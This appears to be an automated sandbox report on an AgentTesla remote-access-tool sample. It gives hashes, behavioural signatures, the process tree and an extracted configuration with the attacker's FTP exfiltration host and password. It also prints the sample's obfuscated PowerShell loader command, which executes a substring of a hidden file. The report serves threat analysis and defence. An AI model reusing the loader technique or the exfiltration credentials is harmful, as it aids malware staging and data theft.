Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-01-2025 02:28
Static task
static1
Behavioral task
behavioral1
Sample
255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe
Resource
win7-20240729-en
General
-
Target
255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe
-
Size
617KB
-
MD5
79cb40033e328f61fe68bd76dd67a7b3
-
SHA1
a68854ec2481fc2f874e2180dabb155e65c6fbd4
-
SHA256
255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6
-
SHA512
7ef13f9f7e75c865a7c8140b9c615687e04cc1e46076de75a963952dff2d000576481854dce0e98cde8db9ee9c12f43cd8def9634fc7b00b09a0b95b6ca6e3cb
-
SSDEEP
12288:MDG0VKZA6BbbHyqrSXA8xvJMUzPvRQIBD7f/KYC+c8cIti62JB8PoZSBm:QKeybHyYSh1CefD7nxFTcIM62H87Bm
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
ro}UWgz#!38E
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 22 3240 msiexec.exe -
pid Process 3016 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3240 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3016 powershell.exe 3240 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2596 3240 WerFault.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3016 powershell.exe Token: SeIncreaseQuotaPrivilege 3016 powershell.exe Token: SeSecurityPrivilege 3016 powershell.exe Token: SeTakeOwnershipPrivilege 3016 powershell.exe Token: SeLoadDriverPrivilege 3016 powershell.exe Token: SeSystemProfilePrivilege 3016 powershell.exe Token: SeSystemtimePrivilege 3016 powershell.exe Token: SeProfSingleProcessPrivilege 3016 powershell.exe Token: SeIncBasePriorityPrivilege 3016 powershell.exe Token: SeCreatePagefilePrivilege 3016 powershell.exe Token: SeBackupPrivilege 3016 powershell.exe Token: SeRestorePrivilege 3016 powershell.exe Token: SeShutdownPrivilege 3016 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeSystemEnvironmentPrivilege 3016 powershell.exe Token: SeRemoteShutdownPrivilege 3016 powershell.exe Token: SeUndockPrivilege 3016 powershell.exe Token: SeManageVolumePrivilege 3016 powershell.exe Token: 33 3016 powershell.exe Token: 34 3016 powershell.exe Token: 35 3016 powershell.exe Token: 36 3016 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2276 wrote to memory of 3016 2276 255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe 83 PID 2276 wrote to memory of 3016 2276 255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe 83 PID 2276 wrote to memory of 3016 2276 255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe 83 PID 3016 wrote to memory of 3240 3016 powershell.exe 96 PID 3016 wrote to memory of 3240 3016 powershell.exe 96 PID 3016 wrote to memory of 3240 3016 powershell.exe 96 PID 3016 wrote to memory of 3240 3016 powershell.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe"C:\Users\Admin\AppData\Local\Temp\255ddfdf1409d89110925cfa93ba323d1a68b6c0916764169eeea521867816a6.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Grnsehandelens=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\stuehuset\Miljfarlig\gerodontology\Uveitic\Delagtig.Sny';$twyver=$Grnsehandelens.SubString(2792,3);.$twyver($Grnsehandelens)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 15284⤵
- Program crash
PID:2596
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3240 -ip 32401⤵PID:2416
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
335KB
MD5b92747ceea51b78e06deb1a3d1058ef8
SHA1bed6ee19460214f67d4c99c5c06dfb862a1843f5
SHA256e8de183c313eb1ff30b0f71e534d0ade02f88a98e62542de5fca8dd9bf760a69
SHA512b85b61db83c9181fa72042c4e3b93a27a98c1eca0eed6ca0f2ad3aefe6f9d2769ce8250f21aa43b336d30fc2cce61fa1a84669ae1a3c83a1dccc1b923573a6ac
-
Filesize
72KB
MD5d0143d2865d3b0c6d80b28821c93e0f7
SHA13291faec3d470bf42818efdcec2d0f8e36f10f39
SHA256ea339cb0657f6173ba6379cf208f2d86d69810e708ce741d53437b553e19d438
SHA5129a19b7e78ae6d736475ab4a4168dc7fa833222b98a6b3b76e9644c51d8087f65c111a7c07776207dc38416a204a6deaef6f169ea6b5446e442afb073dcff1dc6